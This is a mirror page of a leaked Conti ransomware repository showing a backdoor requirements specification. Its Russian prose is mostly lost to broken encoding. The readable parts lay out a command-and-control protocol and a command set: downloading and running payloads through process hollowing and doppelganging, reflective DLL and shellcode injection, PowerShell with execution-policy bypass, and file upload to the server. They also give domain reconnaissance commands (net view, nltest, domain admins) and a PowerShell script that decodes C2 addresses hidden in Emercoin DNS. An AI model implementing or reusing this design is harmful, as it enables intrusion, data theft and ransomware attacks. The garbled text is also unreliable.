archive
/
conti
mirror of https://github.com/MalwareLeaks/Conti-Ransomware-Source-Full
2
0
Fork 0
Code Issues Projects Releases Wiki Activity
Conti Ransomware malware leak WITH LOCKER
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
4 Commits
1 Branch
0 Tags
113 MiB
Tree: cc8163d381
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from 'cc8163d381'
${ noResults }
conti/Conti Documentation Leak/docs/modules/ТЗ бэкдор.txt

658 lines
32 KiB
Raw Normal View History

Add files via upload
3 years ago
  1. ��������������� BACKDOOR
  2. ����������� �������
  4. ����
  5. ����������� backdoor (������������� ������������ ����), �� ������������ ������� ������� ����, ���������� ����������� ��� ����������� �� ������� �����������,
  6. �� ����������� �� ����������� ������ �� ������� ���� (fileless-����������)
  7. � ���������� "���" � "������" - �����-��������.
  9. ����������
  10. Backdoor ������ �������� ��������� ������������:
  11. *- ������������ � ������� (���������� ������������ �������)
  12. - ����������� � ��������, ����������� � ������� � �������� �� ��� �������
  13. - �� ������ �������� UAC
  14. - �� ������ �������� ����������
  15. - ������ ���������� ������� �������� �� ������������� �������� (emercoin dns, ��� �����, ����� � ����������� ������� ��� - ��� ����� ��� �����)
  16. - �������� ����� ������, ���� �� ������ � ���������� ������������ ������� (inetcpl.cpl -> ����������� -> ��������� ������-�������)
  17. - �������� � ���������� �� ������ ���� � �������: **
  18. - ������ � ����������� ��
  19. - ��� � ������ ����������
  20. - �� ����������� ������ �������������� �����
  21. (���������� ���������: �� ������������� ���� �� ����� ��������� - �� ������ �����, ��� �� ��������, ���� ��� ������ ������� ��������� - �� ������������� ����� � ������� �������� ����� �� ����)
  22. - ��� ������������
  23. - ��� ����������
  24. - � ������ ��������� ��� ��� (���� ��, �� �������� ������)
  25. - ������ trusted ������� � ���������� �� ������
  26. (���������� ���������: cmd /c net view /all | /c net view /all /domain | /c nltest /domain_trusts /all_trusts + �������� ����� ��������� ������������ administrator, ��� ����������� � �����)
  27. - ������� ������ �������
  28. - ������ � ���������� ������� ������ �� ����������� ������������� (� ������ - �� TCP)
  29. - ����� ������� � ��������� .exe ��� .dll
  30. - ������ ���� ������ �� ��������� ������� ��� ������������� ������� ��� ��������� (�.�. ��������� �������� � ���������� ������� ������������ ��� ����,
  31. ����� ������������� ���������� ���� �������� �� ������ ��������� ������).
  32. - ����������� ����� ��� ������ � ���� .ru/��� - �������� �� �������; ����� ��������� �������
  33. ������� ���������.
  34. *- �������� �� �������
  36. * ������ �� ����������: ��������������, ��� ��� ����� �������������, �.�. �� ����� ������������ � �������.
  37. ������ ��� ��� �������� ������������� (�����������, ����������, ��������) � ������ ������ ������ �� �����.
  38. ������ �������� �������� � � ������� ������������� ��, ��� ��������� (��������) ���������� ����� ���� ������������ � ������ ������� ������������.
  39. ** ���� ���������� ����� ���� ������� �� ������� ������ � �� �������� ������ �������.
  41. ���� �������������� ���������� (� ��� ����� ������������� shell) ����������� ��������� ������, ����������� �� �������.
  42. ����� ��������� ����� �������� ��� �������. ��, ���� ���� � ������� � ���� � ���, ����� ������������ ��� ������� ��� .exe (����� ���).
  45. ����������
  47. 0. ����� ����������
  48. ������ ������ �������������� ��������� ������:
  49. - ������ �� ��������� � ���� ������, �� ����������� � ���� ���� (fileless)
  50. - �������� � ������� �������������������� ������������
  51. - ����������� ������ �� - Windows 7/Windows 2008 (��� R2)
  52. - �������� ������� ������� - 32-��������� ������, ������� ������ �������� ��� � 32-, ��� � � 64-��������� ��������� (������������ �������).
  53. - 64-��������� ������ ����� ������ � �������� ��������.
  55. Fileless ��������, ��� ������������ ����� ����������� ����������� ��������� powershell, wscript, jscript � ������� ����������� � Windows ����������������.
  56. ��� ������������� ���������� ����-���� �� ����, ������� ������������ ������������� - �������� ��� �������� ���� ������
  57. (��������, ����������������� ����������� .p12, .pfx, .crt ���), ���������� ���� .exe � �������, � �������� ������� (ntfs file streams)
  58. � ������ ����������� ������.
  60. ������ ������ ���� �������� � ������������ � ������������ "���������� ���� � ������".
  61. ��������, ����� �������������� ������ ��������� ����� - ����� ���������� ������������ �������� ������������ Visual Studio (�����, ������������ ������ ����������?),
  62. ���������� ��-��������� ����������� ����������, ���.
  64. ������� ����������� ������� ��� ������ � ������ ������������ (��� �������, ����� Visual Studio - ��� MinGW, �������� clang) � ����� �������� ������������� ����������.
  66. ��� ����� ���� �������� ��� � ���� .exe, ��� � � ���� .dll (��� ����� �������� ������� �� ����������,
  67. �.�. ������������� .dll �� ������ ����� ��� ����������� ������ .exe).
  68. � ����� ������ ����� ����� � .dll - ������� DllMain(DLL_PROCESS_ATTACH)
  70. 1. �������������
  71. ������ ������ ���������� ������������������ ���������� ���������������.
  72. ������������ ������������ md5-��� �� ������ "����_��������%windir%.���_����������.����_��������%windir\system32%.���_������_���_workgroup",
  73. ������ ������������ �� hex-�������������, � ������� 10-���� ������������� ���� � ���� �������� 128-������� �����.
  74. - �� ������ ��� ������ ��������������
  75. - ��� ���� �� ������ ���� �������� ��� ������� �� ������ ������������� �������
  76. - �� �� ������ ����������� �� ����
  77. - �� ������ ���� ��������
  79. ������ ������ ��������������� �������� ������ - ������ ������������ �����. ����� ����� ����� �� ����������������.
  80. ��� ������ � �������� �� ����� ������; ������������ �� �������������� � ����� ������ ���� - ���� ������������ �� ������.
  82. ���� � ���� ���� ������ �������� ������ � ���� ������ ����, �� ��� _��_����������_ �������� ������ � �������� (��.����).
  84. ������������� ����� ��� ����, ����� �������� ������ ���� �� �������.
  85. ������ ����� ��� ����, ����� ����� ��������� ���� (���������, �������� �������� �������� � ���).
  88. 2. ������ �� ��������� ����������
  89. ��������� �������� ������� ���������� �������� ���������:
  90. - ������ �������� ��� ������������������� ����������
  91. - ������� �������� ���� �� DNS-��������
  93. ������ ������� � ��������� ��������� �������� �� �������� �������, � �������������� ����������.
  94. �������� �������� ���������� � ��������� ������ � �� ����������� ���������.
  97. �������� ������ � BACKEND��
  99. 1. ����� ����������
  100. ���� ����� ���� �� ��������� HTTP(S). �������� �������������� ��������� ����� ������ ���������� (DNS, ICMP) � ����� ������� ���������� � ������� �������,
  101. �� ���� - HTTP.
  103. ��� ������� �������� � URI ������������� �������, ��� �������� � ���������, ��������
  104. GET /%id%/%operation%/%params%
  106. ����� � HTTP-����� 200 ��������� ��������; ��� ����, �� ������ 200 ���������� ��������� ��������.
  108. ������ ������ ������������ ��� ����� ������� �� ������ � ���� ��������� Cookie � ������ group � ��������� ������.
  110. ��� ������� ���������� ����� �� ���� ������������, ��� ���� ���������.
  111. � �������� ��������� ���������� ������������ XOR. ������ �������� ������������� ������� � HEX-�������������.
  112. ��������������, ��� ������� ����� �������� � �������� ���� �� ����������
  113. ����������� ���� ����� ��� ������� ����.
  114. ��������������, ��� ������� ����� ���������� ����� ����������� �����, ����� ���������� �� �����
  115. �������� ������ � �������.
  117. ��� ������� �������� ������ �� ������ (POST) ������������ ����� �� ���������� ����������� ���� POST-�������.
  119. ��� ������� ������� ��������� �� ���������� ������������ ���������:
  120. - %cmdline% ������������ ��� ����������� ��������� ������, ������������ ������������ ��������. ��� ���� � ��������� ������ ����� ���� �������.
  121. �� ����, � ������� ���� "10 https://site.com/file.xyz -c -z -a" ��������� ������� �������� ��������� "-c -z -a",
  122. ��� ������������� ��������� ����������� %cmdline% � ���������� ��������.
  123. - � ��������� ������ ����� �������������� ������ %id%, ������ �������� ������������� ������������� ������� � ���������� �������������.
  124. ��������, ���������� �������� � �� 12345 � ������� ������� "10 1 0 https://site.com/file.xyz -c -z -a -i %id%" ������ ���� ������������� �
  125. ��������� ������ "-c -z -a -i 12345" ����� ��������� ������������ ��������.
  126. - ��� ������ ������������ �������� ������ ��������������� ���������� ��������� VERS, ���������� ������������� ����.
  128. � ���������� ������ �������� ��������� ������ ����� ���� �������� - �������������.
  130. ������ �������� � ������ cmd/powershell �������������� ������ ������� CreateProcess().
  131. ������ ��������� .exe ������� ����������� � ������� �������� ������ Process Hollowing/Process Doppelganging.
  133. 2. ����������� � ���������� �������
  134. � ������� ������� �� ����� ������ ��������� ����������:
  135. - ������������� ������
  136. - ����� ��������� ������� ��� �����
  137. - ����� ��������� emercoin-������� (���������)
  139. �������� ������ � ��������� � ������� ������ � �� ����������� ���������.
  141. ��� ����� ������� ���� � ��� ������������� ���������� � �������� (����� ��� ���������� ������ �� ��������), �� ���������:
  142. - ������ ��� ��������� �������
  143. - ������ ��������� ����� ������� �� ��������� � �� ����������� ���������.
  145. ��������������, ���:
  146. - ���� ��� ��������� ������� ����, �� ������ ���������� ������� ������ ����� ������������ ����������
  147. - ���� ��� ���������� ����������, ����� ����� ���� ���� � �� �������� ���� ����������� � �������.
  149. ����� ������� IP-������ �� ������ Emercoin, ������� ������������� IP-����� ����� �������� XOR 254 ��� ������� ������.
  150. ��������, 124.245.101.251 (������� �� DNS-������) -> 130.11.155.5
  152. �.�. DNS-���������� �������� �������, ����� ������� ���������� �� ������ �� ������ �� DNS-������ �������.
  154. ��� ������� ipxor.ps1 �� PowerShell:
  155. $ip = read-host -prompt "Enter IP";
  156. write-host $ip;
  157. $newip = '';
  158. ($ip.split('.') | foreach {
  159. $octet = [byte] ( $_)
  160. $octet = $octet -bxor 254;
  161. $newip = -join($newip,'.',$octet);
  162. }
  163. )
  164. write-host $newip;
  167. 4. ������ �������:
  168. GET /%id%/2
  170. �����: ����� ���� "���_������� ���������"
  172. ��� ���� ����� ������:
  173. - �� ��������� ������ 5 �����
  174. - ���� �� �������� �� ���������� �� ����� ������ NOP (��.����)
  176. ����������� ������ ��������� ���������� (������� ������ �� ���������� � ��-������� ��������� timeout),
  177. �.�. ��������������, ��� ����� ��������� ���������� ���������� ������� ����� ����������� ���������.
  178. ���� ���������� ������� ���� �����������, �� HTTP-������ ������� �������� ��� �����, �� ������������ ��� ������� ����� 14 (����� ���������).
  180. ���� ������� � ���������:
  182. 0 NOP %time% - ��� ��������. ����� - ����� ������, �� ������� ������ ������� ��� �� ���������� ������� �� ������.
  183. 1 %time% �������� ���������� � �������. ����� - ����� ������, �� ������� ������ ������� ��� �� ���������� ������� �� ������.
  184. �������� time ������������.
  185. * ���������� � ������� ����� ����� ���������� ����� ������� .cmd-������� (�������� 12)
  186. 10 %runtype% %timeout% %mask_process% %URI% %cmdline% - ���������� � ������ .exe-�����
  187. 10 4 [%mode% %cmdline%]
  188. - %runtype% - 1 ��� �������� ������� (CreateProcess; ����������� ���� ������������ �����������)
  189. 2 ��� ������� �������� process hollowing (����������� ���� ��� �� ����������� ��� � ������)
  190. 3 ��� ������� �������� process doppelganging (����������� ���� ��� �� ����������� ��� � ������)
  191. (�������� ������������� ������� Process Herpaderping)
  192. 4 ��������������: ��������� ���� ���������� ��������� ������ � ���������������.
  193. ���� ���� ������, ������ ��������� �������������� ����� ������� ���������� (�� �� ��� ����� 0, �������� ��� �������������)
  194. %mode% - ����� �������:
  195. 0 - ��� ����� (��������� ������, ������� ��������� ���� ��� � ��������� ������)
  196. 1 - exe-������, ������ ��������: filename.exe %cmdline%
  197. 2 - dll-������, ������ ��������: rundll32 filename.dll,%cmdline%
  198. 3 - dll-������, ������ ��������: regsvr32 /s filename.dll %cmdline%
  199. 4 - js-������ (������ ������� ���� ����� ��������)
  200. cmdline - ��������� ��������� ������ �������
  201. ��� mode=2 ������ �������� - ��� �������-������� - ����� ����� � ������
  202. 5 ���� ����� �� ���� ��� �������. cmdline ������ ������ ���� ���� �������� ����.
  203. - %timeout% - ������� ���������� �������, � ��������. 0 - �� ���������� ���������� ������� (�������, ��� ������� ���������� ��� ������� �������)
  204. ���� ������� ������, ��� ������ ��������� ���������� ������� � ������ ��� � ������ �� ���������� ����������� ��������.
  205. ��� ����, ��� �� ����� ��������� ������� �� ������ ����� ��������� �� ��������� ���������� �������� (������ ����� ������� �� ������� ��������� ������� � ����� ������������).
  206. ���� ������� �� ������, �� ����������� ������� ��������� �������, ��� ������ �� ������� ���, � �� ����� ��������� ����� �������� ��� �����������.
  207. ���� ������� �� ���������� �� ��������� �������, ��� ��������� ������� � �������� ������ �� ������.
  208. - %mask_process% - ��� �������� ��� ���������� process hollowing/process doppelganging
  209. 0 - �� ������������
  210. 1 - notepad.exe
  211. 2 - explorer.exe
  212. 3 - svchost.exe
  213. 4 - cmd.exe
  214. - %URI% - ����, ������ ������� ������� ���� (� ������������); ���� ������� ������� ����, ��� ������� - � ����� �� ������� ��������� "could not download file from %uri%"
  215. � ��������� ������ 2 ���� �������� ����������� (����� � � ��������� ��������), �������� ���������� � ���� GET-������.
  216. - %cmdline% - ��������� ������ ��� ������� (������������)
  217. 11 %runtype% %pid% %timeout% %URI% %cmdline% - ���������� � ������ .dll-�����
  218. - %runtype% 0 - rundll �������������� ������ �������� rundll32.exe ��������� �������:
  219. rundll32.exe dllname.dll,%cmdline%
  220. 1 - regsvr �������������� ������ �������� regsvr.exe ��������� �������:
  221. regsvr.exe dllname.dll %cmdline%
  222. �������� ����� ����� dll ������ DllRegisterServer
  223. 2 - regsvr (silent) �� �� ��� � 1, ������ ������ �������������� � "�����" ������, ������� �������: regsvr32.exe /s dllname.dll %cmdline%
  224. 3 - reflective injection � ������� %pid%.
  225. 3 � 4 ��������� ���
  226. �������������� ������������ ������� ������������ �������� https://github.com/dismantl/ImprovedReflectiveDLLInjection
  227. �������� ������� ���������� (bootstrap function, � ��������� �-� ReflectiveLoader) ���������� ������ ���������� %cmdline.
  228. 4 - reflective injection � ����������� �������
  229. - %pid% 0 �� ������������ (��� runtype 0 1 3)
  230. �� 0 - ����� �������� ��� ������������ ��������
  231. 12 %runtype% %timeout% [%cmdline%]\r\n%script% - ������ .bat-������� � �����������
  232. - %runtype% - 1 ������ ������� ����� ����� (��.���������� � ������� 13 �� ������� �������)
  233. 2 ���� ������� �� ���� � ������ ����� CreateProcess
  234. - %cmdline% - ��������� ������ ������ ������� (�.�. ��, ��� ���������� � ���������� %1, %2 ��� � .bat-������ - ��� �� ��������� ������ �������� cmd.exe!
  235. �������� ��������������
  236. ����� ������� ��������� ����� ����������� ������ \r\n
  237. ��� ������� ������� � ������ �� ����, ��� ����� �� �������� ����������������; ����� ���������� ��������� ���� �� �������� ���������
  238. 13 %runtype% %timeout% [%cmdline%]\r\n%script% - ������ powershell-������� � �����������
  239. - %runtype% - 1 ������ ������� ����� �����
  240. 2 ���� ������� �� ���� � ������ ����� CreateProcess
  241. - %cmdline% - ��������� ������ ������ ������� (�.�. ��, ��� ���������� � argv � .ps1-������ - ��� �� ��������� ������ �������� powershell.exe!
  242. ����� ������� ��������� ����� ����������� ������ \r\n
  243. � ��������� ������ 2 ����� ������� ���������� � ���� GET-������.
  244. �������������� ������ ��������� �������:
  245. runtype = 1
  246. ����������� ����� � ������������ ��������, ��� ���������� ����������� � STARTUPINFO ��� ������� powershell.exe, ����� ������ ������� � ���� �����.
  247. Powershell ����������� ���:
  248. powershell -
  249. runtype = 2
  250. powershell -executionpolicy bypass -file tmpscript.ps1 %cmdline%
  251. ��� ������� ������� � ������ �� ����, ��� ����� �� �������� ����������������; ����� ���������� ��������� ���� �� �������� ���������
  252. 14 - reset. ����� ����������� ���������� �������. ���� ���������� ������� �������� ���������� (���� ���������� ���������� ��������),
  253. �� ���������� ��� ��������� � ������ ������ �� ����.
  254. 15 %pid% - ���������� �������� (TerminateProcess)
  255. 16 filename - ��������� ���� � ���������� �� ������
  256. 17 %hexcode% ������ ������������� ��������� ���� � ��������� ������������ ��������,
  257. ��������� ��������� ������� https://github.com/DimopoulosElias/SimpleShellcodeInjector/blob/master/SimpleShellcodeInjector.c
  258. ������ ����: AB CD EF 01 23 45 67 - 16-������ ������ � ������������ ��������, ������� �������, ��� ��������� ������, ����� ���������� 1 ����������.
  259. ������� �� ������������. �������������� ��� shell-��� �� �����������.
  260. 18 %timeout% ����������� � �������. ��������������, ��� ��� ���������� �� ���� ������, � ���������.
  261. 100 ��������� �� �������.
  262. ������� ��������� ������ ��� �������� ����, ������� ���������� ����������� � �������.
  264. 5. ��������� ���������� ���������� �������
  265. POST /%id%/3
  266. ���� ������ �������� ����� � �������� form/urlencoded.
  267. ������������� ������� �� ���������� �������.
  269. ��������������, ��� �� ��������� ������ �� �������, ����������� ������� �� ������� �������������
  270. (����� ���������� ����� ������, ����� �� ����� �� ������ ������).
  272. ��� ���������� ��������� � ����� �� ��� ���, ���� �� ����� ������� ����� ����� �� ������� (� ��� ����� ��������� - HTTP-���� 40*, 50*)
  273. ���� � ������� ���� ������� ��� ������� ��������, ��� ��������� ��������� ��������, ������ �� ���������� ��������� � 30 �����.
  274. ���� �� ��������� �����, ����� ������ ��� �� ��������.
  276. 5.0. ����� �� ������� ������� ������
  277. ��� ������ ������� ����� ����� ������� �� ���� ������: �������������� ��������, � ������ ��������� (stdout � stderr), ����������� �������� ����� ������.
  279. pid=1234
  280. stdout and stderr here
  282. ���� ��������� ������ �������, � �������� �������������� �������� 0 (����), � ��������� ������� ���� ��������� �� ������.
  284. 5.1. ����� �� ������� 1 � ����������� � �������
  285. ���� POST-������� ������������ � �������� form/urlencoded, �� ���������� ������:
  286. group=%��� ������%
  287. path=������ ���� � ��������� ����� ������� (���� �� ������������ ��������� fileless ����������)
  288. os=3-7 ���� ���������� major-version, minor-version � build ������������ �������, ���� ������� ������� � �������
  289. (��������, ��� 6.1 build 7600 ��� ����� 617600).
  290. os[1]=������� ���� �� (W=Windows) � ������ ��
  291. os[2]=���� ��
  292. os[3]=ProductInfo https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getproductinfo
  293. ��� Windows 7 (Version 6.1 build 7600 ProductInfo 0x00) ��� ����� os[1]=W61&os[2]=7600&os[3]=00
  294. arch=����������� (�����������): 86 ��� 64
  295. cname=��� ����������
  296. uname=��� ������������
  297. av[]=��� ����������
  298. avp[]=������ ����������
  299. domain=��� ������ ��� ������� ������ ���������� (����� �������� �� NetWkstaGetInfo)
  300. net=��������� ������� net view /all
  301. netdomain=��������� ������� net view /all /domain
  302. net group "Domain Computers" /domain
  303. trust=��������� ������� nltest /domain_trusts /all_trusts
  304. admin=��������� ������� net localgroup "administrator"
  305. admindomain=��������� ������� net group "domain admins" /dom
  306. soft=������ ������������� ��������
  307. ip=������� IP-����� ����������
  308. locale=������
  309. tz=��������� ����
  310. ps=������ ���������
  311. wsl=������� ���������� WSL/WSL2 �� ����������
  313. 5.2. ����� �� ������� 100 �������� �� �������
  314. ������ OK � ������ ������, ����� ������������ ������ � ��������� ������ � ������ ������.
  316. 5.3. ����� �� ������� 10-4 ��������������
  317. ������������ ������ � �������, ���������� � ���������� �������� ��� ���������� �������.
  318. ��������, "��", ��� "Will autoupdate in 60 seconds", ��� "Cannot proceed"
  320. 5.4. ����� �� ������� 15 �� ��������� ��������
  321. � �������� ������ ������������ ��������� ���������� GetLastError() ����� ����� ���������� TerminateProcess()
  322. � ���� ����������� �����
  324. 5.5. ����� �� ������� 16 � �������� ����� �� ������
  325. � �������� ������ ������������ ���������� ����� "��� ����", ��� ����������� x-www-urlencoded ��� multipart/form-data, ����� �� ��������� ����� ��������
  326. �� ���� ����������� �����������.
  327. ����������� ������ ������������ ��������� Content-Length.
  328. �������� ��������� Content-Type: application/octet-stream
  329. ���������� ����� �������� �� 10 ��������.
  330. �� ������� ��������� ���� �������� �������, � ���� ���� ��������� �� ������, �������� File too large (������)
  332. ������� ��������� � ��������� ���� ��� ����� �������; ���� �������� ��� ���������� �� ������� ������ ����������� ����.
  334. 5.6. ����� �� ������� 17 � ���������� ������������� shell-����
  335. ������������ ������ � �������, ���������� � �����������.
  336. ��������:
  337. HEX parse error
  338. Done
  339. Still alive ���
  341. 5.7. ����� �� ������� 18 � ����������� � �������
  342. ������������ ������ � �������, ���������� � �����������.
  343. ��������:
  344. Done
  345. Error anchoring, error code = %ld
  346. Still alive ���
  348. 6. �������� ���������
  349. POST /%id%/4
  350. � ���� POST ���� ������������ ���������, ������������� XOR %id%
  351. ������ ���������� ��������� �� ����� ���������� (�� � ����� �� �����-���� �������� ��� ������ � �������).
  353. ������� ������������ ��������� ��������� ��� ����� ���� - �� ����� �������.
  354. �������������� ������������� ���� ����������� ��� ��������� ����������� � �����������.
  357. �������, ����������
  359. ������ �����
  360. - ������������ ���� � IP-�������, ���������� ����, �������, �������, ��������� �����������, ��������� �������
  361. (���������� ���������: ��� ��� ���������� ��������� ��� ��� ����������, ������������ �������� ������������)
  362. - ������� � ���������� �� ���� �����
  363. � ��� �����, �� ������ ������, ����� ����� �� ���� ��������� ���� (������ ��, �������/���������� �����, ���)
  364. - ��������� ��� ����������� ������ (�� ����� ������������)
  366. �� �������� ����:
  367. - ����������� ������ ������� ��� ���� (������������ ������������� ��������� ����)
  368. - ����� ��������� ����������
  369. - ���������� � ������� ��������� �������/�����
  370. - ������� ���� (� ������������ � �������� ������ �� �����.�������)
  371. - ������� ���� (������ ������� � ����� - ���������, ��� �������� ���������� ������� � �����-�������� �� ����� ������������,
  372. ������� �� ���� (������ 4))
  374. ��������������, ��� ����� ������ ������� ����, ����������� ������� ����������� �� ��������� ������ � ����.
  375. ���������� ��������� ����� ����� ���� � ������� (������ ������ �������, ��� ������� �������� ������� ����� �������).
  377. � ������, ���� IP-����� ������� ������������� � ���� ���, ��� ������� ����� "���������" ������ ���� ��������� � ���������.
  379. �������������� ������� ����������� ����� ����������� ������ (��� �������), ��� ��� �������� ���������,
  380. ��� � ��� �������� ������� � ������� �� ��������� ��������� ����� � ��� �� ������ � �������.
  382. ���� �������:
  383. - ����� (����� ��������� � ������� ���������� � ������ ���)
  384. - ��������
  385. ������� ������� ��������� ������������ �� ���������:
  386. - ������ (� ������ ������)
  387. - ������ (��� � ����� - �� ������ ������)
  388. - ��������� IP-�������
  391. ����������
  392. 1. ��� ��������� �������� IP-������
  393. 2. ��� DNS-������� ����� Emercoin
  394. 3. ��� ��������� ������ ������������� ��������
  395. 4. ��� ������� ��������� ����� process hollowing/doppelganging
  396. 5. ��� DNS-������� ��� TCP-����������
  397. 6. ��� ���������� �����
  398. 7. ��� ���������� ��������� �������
  401. ���� ������������
  403. ������ �������������� ������������ �������� ���:
  404. - ������������ ����� ���������� �������
  405. - ������������ ��������� � ������
  406. - ���� �������� ������������ ���������� � ������.
  408. ������ ���� �� ����������� �������� �����������.
  410. ���� �� �� �������� ��������� � ��� ���������� �������.
  411. �������� (�������) ����������� �� ��
  412. - ����� ����, ��� ����������� �������� ������
  413. - ������ ����, ���� �� ���� �������� ��� ������ (���� ���� �������, ����� ���� ������ ������)
  414. - ���� ���� ��������� �������� ��� ���� �������.
  415. ����� ����������� �� �� ������.
  417. ������ �������������� ������������
  419. ��������� ��� ������� � ��������� - ����������� ���������, ������, �������.
  420. � ���������� ���������� ����� ��������� �������� �������� � �������� ������, �� ������ ������ �� ������ �����, ���� �� ������� �������.
  422. 0. �������� �� ������������ �������� �������� - ������������ � �������������� ������, x86 � x64.
  423. ������� ��������� ������������ ������, ����� ��������������. ��������� �� ����������� � ���� ����������� �������.
  424. ��� ������ �����, ����� �� ����� ������ ����� ���� �������� ��� � ������� ������������ �� ������.
  425. ���� ��� �������� �������������� ������ �������� ������, �������� ��������� �� �� ������������.
  426. ���� �� ������������ �����������, ��������� ��� � ����� ������������.
  427. ���� �� ������������ �� �����������, ��������� ��� ��� ������������ ������ �� �������������� ������.
  428. ������������ ������� ������ ����� �� ����� ���� - �� ������ ������� ������ ��� ������� ���������� (����������� ����, ��������� �� �� ���),
  429. ���� ����� �� ��������� (��������, ���� ��� �� ����������� ������, ������� �������� ���������� ����������� ��������� ��� ���).
  431. 1. ��������� �� ������� �� ������.
  432. 2. ��������� � ������� ��� ����� ���������, �������� �������� ������ ����� ����.
  433. ���� �������, � ������� 5 �����. ���� ������� ���, ������, ����.
  434. ��� ������ ������������ ��� "online", ���� � ������� ���� �� 15 ��������� ����� � ��� ���� �����.
  435. 3. ��������� �� ������� �������.
  436. ������ ������� ����� ����������� � ��������� (�� 5 �����) - ��� ���������.
  437. 3.1. Get System Info
  438. ������ �������� ���� � ������� � �����.�������.
  439. 3.2. Run .exe � ������� ������������ ����� Run Type, Host Process (Mask).
  440. �������� ��� ����� ����� ����, ������� �� ������� ��������� .dll (���������� ��������������). ��������, pscp.exe.
  441. ������� ������ �����������, � ����������� ���������� ������� ������ ���� ����� ������ ���� �������.
  443. * ��� ������ ���� timeout = background run, ����� �� ������� �� ��������� - ������� ����������� � ���� � ������ �� ��� �� ����������.
  444. ��� ���������� ����� � ������ ����� ������.
  445. 3.3. Run .dll
  446. TODO
  447. 3.4. Run .bat
  448. 3.4.1. ������ �����-������ ��������� �������, �������� hostname, whoami, date /t
  449. ������� ������ �����������, � ����������� ���������� ������� ������ ���� ����� ������ ���� �������.
  450. 3.4.2. �������� �������������� .bat-���� �� ���������� ������. ����������� ������ ����� ��������� ��������� ����� ����� �� ����� ������.
  451. ������ ������ �����������, � ����������� ���������� ������� ������ ���� ����� ������ ����� �������.
  452. 3.5. Run PowerShell
  453. 3.5.1. ������ �����-������ ��������� �������, �������� $PSVersionTable.PSVersion
  454. (������� ������ Powershell)
  455. ������� ������ �����������, � ����������� ���������� ������� ������ ���� ����� ������ ���� �������.
  456. 3.5.2. �������� �������������� .ps1-���� �� ���������� ������. ����������� ������ ����� ��������� ��������� ����� ����� �� ����� ������.
  457. ������ ������ �����������, � ����������� ���������� ������� ������ ���� ����� ������ ����� �������.
  458. 3.6. Reset
  459. ����� ����������� ���� �������, ����� ��������� ���������� ����-���� ����������� (����� ����������� run .bat timeout 10000),
  460. ��� ����������� ���������� ������ �����.
  461. ����� ���������� Reset, ���������� ����������� ������� ������ ���� �������� ��� done, ��� ����� � ������ ��������� �������.
  462. 3.7. Terminate Process
  463. ������� ������� ������� �� ��� ������ (pid)
  464. ��� ����� ����� ����������� �������-������ (�������� ��������� notepad.exe ������ � ���������� ��� ����� � ���������� �����).
  465. ����� ���������� ������� ������� ������ �����������.
  466. 3.8. Download File
  467. ������� ��������� ���� � ������� ������ (������ �� 10�)
  468. ����� ������ ������ ���� � ����� � �����.����.
  469. ����� ���������� ������� ���� ������ ���� �������� ��� ����������, ������ ������ �������������� � ����������� ���������� �������.
  470. 3.9. Suicide
  471. ������� ������� ������ � ������� ������.
  472. ����� ������������ ������ ��� �� ������ �����������.
  473. 4. �����������.
  474. ����� ������������ ������ ��� ������ ��������� � �������.
  475. 5. �������.
  476. �� ������ ���� �������� �� �� ������, �� �� ���.
  477. 6. ����������
  478. 6.1. ���� ������� ������ x86 �� ������ x64, �� ������ ����� ������ ���������� �� x64 ������ ���� ��,
  479. � ����� ��������� ������ x64 ����.
  480. �������� ������� - ������ ������ ��������� ���� ����������� ��������� �����������.
  481. 6.2.1. ������� � ������ ������� ��� ����� QA (��� �������, ������� �������� �� ������ � ����������)
  482. 6.2.2. ������� �������� � ����� ������� ���� � �������, � ������� ������� �� �� ������, �� �� ���� ����������.
  483. 6.2.3. ������ � ������������ ������ � ������� ����� ���������. ����������: � ������� ����� �� ��������� ����� ���� ���� ������.
  484. 6.2.4. �������� � ������ ����� ������ ������, ���������� ������ �������� �� ���������� ���� ������.
  485. 6.2.5. ������������� ������� ������. ���������� ������ ������� �� ������.
  487. ���� �� �����������
  489. ����������� ������ ������ � �������, ������������ ���������� � ��������� ������ ����� ������������.
  490. �����!
  491. ���������� �������� � ������������ ������ �����������. ������ ����� ������������ ����� ���������� � ��������� ��� �� ���������� ��������.
  493. ���� �� ������������ �������
  495. ��������� �� �� � ������ �� ������������:
  496. - ����� ������������� � ����� ���������� � ������
  497. - �������������, ��� ��������� ������������.
  499. ����� �� dyncheck ������������:
  500. - ����� ������������� ������� ���������
  501. - �� �������������
  502. ����� �� ������� ������ �����, ���� �� ��������� �������.
  504. ������������� ����� ������� ��������� ����� ��������� ������������ ����� ���������� �� ������, ��������������� ����������,
  505. � ������ ����� ��������������� ����������.
  508. ���� ������������ ������
  509. �������� ������ ��� �������.
  510. ��������� �� ���������� ���� �����!
  511. 1. ��������� ��������� � ���������� ������. ������ (��) ��� � 30 ��� ����� ����������� � ������� (A�M) �������,
  512. ��������� � ���������� �����.
  514. 2. ������� ���������� � �������. �������� � �������� ���������� 60 ������.
  516. 3. ������ ������� GET /%id%/2, ����� POST /%id%/3.
  518. 4. �������.
  520. 4.1. "0 %time%" - � ������� no_operation 30 ���.
  521. ������ ���
  522. ��� ������� ����� ������ ������ ��� ��������� ������������, �.�. 30 ��� ����������� ��� �� ��������.
  525. 4.2. ������� 10. ��� ������� ������ �������� �� ������ ���������, � �������� ������� ������������ test32.exe.
  526. ��������� test32.exe ������� � stdout ����� "test" � ������ ���������� ����������. �� ������ �������� ���� ����� � ��M.
  527. ����� ������ 10 %runtype% %timeout% %mask_process% %URI% %cmdline%.
  529. 4.2.1 "10 1 60 0 %URI% a b c %id%"
  531. ��� ������ ���������� �������� %URI% � ����� � test32.exe,
  532. a b c %id% - ��� ��������� � test32.exe, �� ������ ��� ����, ������ �� ������� %. %id% - ������, ������� �� ������� �� ���� id.
  534. ����� ��� ��������� �������:
  535. pid=0
  536. msg=program start error
  538. ����� ��� ������� �������:
  539. pid=NNNN
  540. stdout=����� �� ���������
  542. ����� ��� ������ �� ��������:
  543. pid=NNNN
  544. msg=timeout
  548. 4.2.2 "10 1 0 0 %URI% a b c %id%"
  549. �� ��, ��� � 4.2.1, �� timeout = 0
  551. ����� ��� ��������� �������:
  552. pid=0
  553. msg=program start error
  555. ����� ��� ������� �������:
  556. pid=NNNN
  557. msg=program is running
  560. 4.2.3 "10 2 60 1 %URI% a b c %id%" - process hollowing
  561. ������ ����� ��
  563. 4.2.4 "10 2 0 1 %URI% a b c %id%" - process hollowing, timeout=0
